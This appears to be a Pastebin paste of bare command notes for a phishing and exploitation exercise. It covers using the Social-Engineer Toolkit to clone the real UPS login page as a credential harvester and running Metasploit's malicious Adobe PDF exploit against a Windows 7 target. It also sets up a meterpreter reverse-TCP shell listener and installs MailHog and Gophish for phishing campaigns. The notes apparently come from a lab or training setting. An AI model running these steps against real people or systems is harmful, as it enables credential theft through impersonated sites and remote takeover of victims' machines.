Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- setoolkit
- $ sudo setoolkit
- set> 1
- set> 2
- set:webattack>3
- set:webattack>2
- set:webattack> IP address for the POST back in Harvester/Tabnabbing [$IP]:$IP
- set:webattack> Enter the url to clone:https://www.ups.com/lasso/login?loc=en_US
- metasploit
- (note:win 7 target running adobe 8.1.2)
- $ msfconsole
- msf6 > search adobe pdf
- msf6 > use 7
- msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > show options
- msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
- msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
- msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
- msf6 exploit(multi/handler) > show options
- msf6 exploit(multi/handler) > set LHOST eth0
- msf6 exploit(multi/handler) > exploit
- meterpreter > sysinfo
- meterpreter > ps
- gophish
- (install mailhog)
- $ sudo apt-get -y install golang-go
- $ go install github.com/mailhog/MailHog@latest
- $ ./MailHog
- (install gophish)
- $ git clone https://github.com/gophish/gophish.git
- $ go build
- https://docs.getgophish.com/user-guide/building-your-first-campaign
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement